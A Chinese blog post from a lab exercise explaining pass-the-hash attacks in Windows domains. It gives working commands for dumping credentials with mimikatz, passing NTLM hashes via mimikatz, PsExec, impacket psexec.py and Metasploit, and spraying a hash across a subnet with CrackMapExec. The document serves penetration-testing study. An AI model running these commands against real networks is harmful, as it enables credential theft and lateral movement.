域环境PTH(pass-the-hash) HASH 传递

最新推荐文章于 2024-05-28 09:39:51 发布
最新推荐文章于 2024-05-28 09:39:51 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 内网域环境 文章标签: 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122576502
版权

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

PTH(pass-the-hash) HASH 传递

描述:

pass-the-hash 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。

原理:

在windows中,通常都会使用NTLM身份认证,NTLM不使用明文密码,而是使用口令加密后的hash值,hash值由系统API生成;如果攻击者获得了hash,那么就能够在身份验证的时候模拟用户进行登陆,从而跳过条用API生成hash的过程。
因为对PTH攻击微软加载过相应的补丁,所以常规的PTH是无法成功,唯独administrator(SID500)这个账号例外,那么我们就可以利用这个账号来进行pass-the-hash远程ipc连接
注:如果禁用了ntlm认证,psexec无法利用获得ntlm hash进行远程连接,但使用mimikatz是可以攻击成功。

mimikatz pth

先进行初始化:

privilege::debug #初始化

将hash进行导出:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt #将hash导出到password文档里面

在这里插入图片描述
在这里插入图片描述
本地实验是可以成功反弹cmd:

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:b4a59c7bdab7afee29d42e90e5a185cb

在这里插入图片描述
假设我们域内有多台主机的密码是一样的,我们通过前期的信息手机已获得了域用户名,那么我们同样可以使用mimikatz来远程登陆:

sekurlsa::pth /user:administrator /domain:192.168.1.8 /ntlm:b4a59c7bdab7afee29d42e90e5a185cb

domain这个位置使用IP或计算机名都是可以的。

psexec pth

原理:

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。对方开放 445 端口,就相当于开放了 smb 协议
psexec连接,可以使用先建立ipc,再进行psexec连接,也可以直接使用psexec连接,只不过前者是在IPC连接时,写上密码;后者psexec直接登陆可以使用明文或者hash传递。
IPC连接:

net use \\192.168.1.8 /u:administrator 456789 #建立IPC连接
Psexec64.exe /accepteula /s \\192.168.1.8 cmd.exe #使用Psexec反弹cmd
net use \\192.168.1.8 /del #删除IPC连接

在这里插入图片描述
在这里插入图片描述

/accepteula #当第一次使用,不需要弹窗确认
/s #以system权限运行。如果不使用这个参数,则是返回当前用户正在使用的权限。
PsExec.exe /accepteula /s \\192.168.1.8 -u Administrator -p 456789 cmd /c "ipconfig"  #使用明文登陆反弹system权限

在这里插入图片描述
当不使用/s命令时,我们来查看权限:
在这里插入图片描述
利用psexec脚本完成hash传递:

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b ./Administrator@192.168.1.8

这里采用的hash格式是LM Hash:NT:Hash,所以LM Hash是可以随意的数字来代替。
在这里插入图片描述
利用psexec 使用明文密码登陆:
在这里插入图片描述

MSF psexec模块 pth

use exploit/windows/smb/psexec
set SMBUser administrator
set rhosts 192.168.1.8
set smbpass aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b
exploit

在这里插入图片描述

使用CrackMapExec工具来进行pth

windows使用下载地址:
https://github.com/byt3bl33d3r/CrackMapExec
在kali中可以直接安装:

apt-get install crackmapexec

对C段进行批量pth:

crackmapexec smb 192.168.1.0/24 -u administrator -H 627782b7274e323941c9418399460d5b

在这里插入图片描述

全局变量Global
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
横向渗透之哈希传递(PTH)
qq_46258964的博客
05-08 1962
哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。 在环境中,用户登录计算机时使用的大都是账号,大量计算机在安装时会使用相同的本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。 kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令, 但是这个补丁不知道为什么漏了一个默认(user SID=500)本
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2678
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
推荐开源项目:CrackMapExecWin - 动态Windows渗透测试利器
最新发布
gitblog_00012的博客
05-28 305
推荐开源项目:CrackMapExecWin - 动态Windows渗透测试利器 项目地址:https://gitcode.com/maaaaz/CrackMapExecWin 1、项目介绍 CrackMapExecWin 是一款专为Windows平台编译的CrackMapExec工具的最新版本。作为一个强大的端点渗透测试工具,它允许安全研究人员和红队操作者快速、有效地枚举和利用网络中的漏洞。由b...
内网横传之哈希传递(Pass The Hash
11-25 7295
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
hash算法的实现原理,hashcode的实现原理
qgj111的专栏
11-29 1318
 1. 引言       哈希表(Hash Table)的应用近两年才在NOI中出现,作为一种高效的数据结构,它正在竞赛中发挥着越来越重要的作用。哈希表最大的优点,就是把数据的存储和查找消耗的时间大大降低,几乎可以看成是常数时间;而代价仅仅是消耗比较多的内存。然而在当前可利用内存越来越多的情况下,用空间换时间的做法是值得的。另外,编码比较容易也是它的特点之一。       哈希表又叫做散列表,
Pass The Hash攻击原理
m0_58606546的博客
11-20 570
验证的整个过程中缺少了一样重要的东西,也就是在故事背景中埋下过的一个小伏笔:windows本身不存储明文密码。 ***PTH原理*** 根据结果逆推:如果需要正确的response(蓝色)来通过认证,因为response本质上也是Net NTLM Hash(红色)根据公式“Net NTLM Hash = NTLM Hash(Challenge)”,我们需要正确的NTLM Hash(黄色)和Challenge(绿色)。而由于Challenge是服务端发送给,只要我们拥有正确的NTLM Hash,即可通过认
Nim-SMBExec:Nim中的SMBExec实现-使用NTLM身份验证和Pass-The-Hash技术的SMBv2
02-03
Pass-The-HashPTH)是一种攻击技术,攻击者获取到用户的NTLM哈希后,无需知道原始密码就可以模拟用户的身份进行认证。在Nim-SMBExec中,这种技术被用来绕过正常的密码验证,通过已知的哈希值来控制目标系统。 Nim...
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递Pass-the-HashPTH)是一种网络安全攻击手段,攻击者在获取了目标系统的NTLM哈希后,可以不需知道原始密码就能在该网络内其他系统上进行身份验证,从而控制系统。这种攻击方式对Windows环境尤其具有威胁...
ckpt.t7 DHN.pth osnet-x0-25.pth yolov7
08-24
标题中的"ckpt.t7 DHN.pth osnet-x0-25.pth yolov7"提到了几个关键文件,这些文件在深度学习领具有重要的意义。它们分别代表不同的模型或训练过程的保存状态。让我们逐一深入探讨这些知识点: 1. **ckpt.t7**:这...
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
PTH(Pass the Hash)是利用NTLM哈希值进行的攻击。在这种情况下,攻击者不需要知道用户的明文密码,只需要NTLM哈希即可尝试登录远程系统。即使NTLM认证被禁用,攻击者仍可以通过Mimikatz这样的工具执行PTH攻击。在...
渗透之Pass-the-hash
ToyCarryYou的博客
04-24 1115
渗透 什么是AD AD的全称是Active Directory(活动目录) 是指windows服务器操作系统中的目录服务,它被包含在大多数windows sever操作系统中,负责集中式管理及身份认证。AD中是每个Windows网络的基石。他负责存储成员(包括设备和用户)的信息,验证其凭据并定义访问权限。运行此服务的服务器称为控制器。AD架构的常用对象包括以下四种 1.**组织单位...
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具.zip
10-10
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具 CrackMapExecWin描述为 Windows 编译的伟大 CrackMapExec 工具特性最新 2.2 版本编译为 x86,因此应该在 x86 和 x64 平台上工作用法下载整个归档文件。提取并运行 cra
渗透——Pass The Hash & Pass The Key
citelao的博客
03-21 1256
渗透——Pass The Hash & Pass The Key 三好学生 · 2015/12/28 10:15 0x00 前言 对于Pass The Hash大家应该都很熟悉,在2014年5月发生了一件有趣的事。 微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997,标题为“Update to fix the Pass-The-Ha
内网横向之PTH
qq_44029310的博客
10-16 1925
内网横向之PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 709
内网渗透—哈希传递攻击PTH的几种方式
渗透之Hash传递攻击
weixin_65550121的博客
12-08 947
哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。攻击者无须通过解密hash值来获取明文密码。因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击。攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。虽然哈希传递攻击可以在Linux,Unix和其他平台上发生,但它们在windows系统上最普遍。
内网渗透之横向移动wmi&smb&密码喷射CrackMapExec
m0_62207170的博客
04-22 1735
内网渗透之横向移动wmi&smb&密码喷射CrackMapExec
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4228
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
AD渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1143
AD渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
python test.py configs/tusimple.py --test_model tusimple_18.pth --test_work_dir ./tmp
06-01
这是一个运行 Python 脚本的命令,其中 test.py 是脚本文件名,configs/tusimple.py 是配置文件路径,--test_model tusimple_18.pth 是指定测试模型的路径和文件名,--test_work_dir ./tmp 则是设置测试的输出目录。它的作用是运行一个名为 tusimple 的模型进行测试,并将测试结果输出到 ./tmp 目录下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值